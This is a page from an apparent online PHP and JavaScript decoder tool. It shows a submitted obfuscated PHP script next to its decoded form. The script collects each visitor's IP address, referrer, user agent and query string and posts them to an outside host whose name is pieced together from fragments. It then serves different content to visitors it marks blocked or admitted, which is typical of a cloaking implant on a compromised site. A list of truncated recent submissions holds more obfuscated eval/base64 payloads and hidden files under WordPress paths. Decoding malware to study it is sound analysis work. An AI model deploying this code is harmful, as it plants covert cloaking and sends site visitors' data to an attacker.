Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
if (!function_exists('xjrI4MESQN')) {
    function xjrI4MESQN()
    {
        $xQe8Nl = $_SERVER['SERVER_ADDR'];
        $xwf6n = '127.0.0.1';
        if (!empty($_SERVER['HTTP_CF_CONNECTING_IP']) && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xwf6n && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xQe8Nl) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        } elseif (!empty($_SERVER['GEOIP_ADDR']) && $_SERVER['GEOIP_ADDR'] != $xwf6n) {
            $ip = $_SERVER['GEOIP_ADDR'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xwf6n && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xQe8Nl) {
            $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
        } elseif (!empty($_SERVER['HTTP_CLIENT_IP']) && $_SERVER['HTTP_CLIENT_IP'] != $xwf6n && $_SERVER['HTTP_CLIENT_IP'] != $xQe8Nl) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
}
$ip = xjrI4MESQN();
if (!function_exists('x2gyrutF1D7')) {
    function x2gyrutF1D7()
    {
        if (empty($_SERVER['HTTP_REFERER'])) {
            $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER');
        }
        return $_SERVER['HTTP_REFERER'];
    }
}
$ref = x2gyrutF1D7();
if (!function_exists('xGWSYSlLXt')) {
    function xGWSYSlLXt()
    {
        if (empty($_SERVER['HTTP_USER_AGENT'])) {
            $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT');
        }
        return $_SERVER['HTTP_USER_AGENT'];
    }
}
$eRf9t9d9 = xGWSYSlLXt();
if ($_SERVER['QUERY_STRING'] != '') {
    $dHerF777hg = '' . urlencode($_SERVER['QUERY_STRING']) . '';
} else {
    $dHerF777hg = '';
}
$sourcename = 'c';
$whatdo = 'find';
$sourceid = '';
$who = 'us';
$fd = 'x990997';
$dex9 = '.re';
$langua = 'na';
$command = 'st';
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, 'https://' . $whatdo . '' . $who . '' . $dex9 . '' . $command . '/' . $who . '' . $command . '.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 333);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd=' . $fd . '&ip=' . $ip . '&ref=' . $ref . '&ua=' . $eRf9t9d9 . '&data=' . $dHerF777hg . '&sourceid=' . $sourceid . '&sourcename=' . $sourcename . '');
$ifbot = curl_exec($ch);
curl_close($ch);
if ($ifbot == '') {
    echo '<h1>CURL ERROR</h1>';
} elseif ($ifbot != '0') {
    echo '[PHP code without <?php ?> for BLOCKED]';
} else {
    echo '[PHP code without <?php ?> for ADMITTED]';
}
?>

Decrypted code:

if (!function_exists('xjrI4MESQN')) {
    function xjrI4MESQN()
    {
        $xQe8Nl = $_SERVER['SERVER_ADDR'];
        $xwf6n = '127.0.0.1';
        if (!empty($_SERVER['HTTP_CF_CONNECTING_IP']) && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xwf6n && $_SERVER['HTTP_CF_CONNECTING_IP'] != $xQe8Nl) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        } elseif (!empty($_SERVER['GEOIP_ADDR']) && $_SERVER['GEOIP_ADDR'] != $xwf6n) {
            $ip = $_SERVER['GEOIP_ADDR'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xwf6n && $_SERVER['HTTP_X_FORWARDED_FOR'] != $xQe8Nl) {
            $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
        } elseif (!empty($_SERVER['HTTP_CLIENT_IP']) && $_SERVER['HTTP_CLIENT_IP'] != $xwf6n && $_SERVER['HTTP_CLIENT_IP'] != $xQe8Nl) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
}
$ip = xjrI4MESQN();
if (!function_exists('x2gyrutF1D7')) {
    function x2gyrutF1D7()
    {
        if (empty($_SERVER['HTTP_REFERER'])) {
            $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER');
        }
        return $_SERVER['HTTP_REFERER'];
    }
}
$ref = x2gyrutF1D7();
if (!function_exists('xGWSYSlLXt')) {
    function xGWSYSlLXt()
    {
        if (empty($_SERVER['HTTP_USER_AGENT'])) {
            $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT');
        }
        return $_SERVER['HTTP_USER_AGENT'];
    }
}
$eRf9t9d9 = xGWSYSlLXt();
if ($_SERVER['QUERY_STRING'] != '') {
    $dHerF777hg = '' . urlencode($_SERVER['QUERY_STRING']) . '';
} else {
    $dHerF777hg = '';
}


$sourceid = '';


$dex9 = '.re';
$langua = 'na';

$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, 'https://findus' . $dex9 . 'st/usst.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 333);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd=x990997&ip=' . $ip . '&ref=' . $ref . '&ua=' . $eRf9t9d9 . '&data=' . $dHerF777hg . '&sourceid=' . $sourceid . '&sourcename=c');
$ifbot = curl_exec($ch);
curl_close($ch);
if ($ifbot == '') {
    echo '<h1>CURL ERROR</h1>';
} elseif ($ifbot != '0') {
    echo '[PHP code without for BLOCKED]';
} else {
    echo '[PHP code without for ADMITTED]';
}

Recent submissions:

[[\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72]]... eval(base64_decode("\103\x69\102\x6e\142\63\x52\x76\x49\106\x49\x32\x64\62\x39\122\117\... <?php eval(base64_decode('CiBldmFsKGJhc2U2NF9kZWNvZGUoIlwxMDNceDY5XDEwMlx4NmVcMTQyXDYzXHg1... $rixoqu = "/var/www/web3/htdo\x63s/urbex/wp\x2d\x63ontent/\x63a\x63he/.6d977408.\x63ss"; i... $r0ayo = "/var/www/web3/htdocs/wp\x2dincl\x75des/blocks/cover/.75bbc903.css"; if (!isset($... <Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73... <?php $SISTEMIT_COM_ENC = "3Vm5ivNcts0v9Ev8dNCNAmuWTNOBrNGa5ylpkEACTUhKNLyNMVTgwoEDR4WTPi... <?php goto K9Plc; WzsEf: if ($scriptStatus == '' || $scriptStatus == null) { header("\11... <?php function ZXlVoD($MIJ) { $MIJ=gzinflate(base64_decode($MIJ)); for($i=0;$i<strlen... <?php $hbfgofxn_bae93f0=$_GET[base64_decode('cG9ydGFs')];$vmyytkhy_73918303=$_GET[base64_d...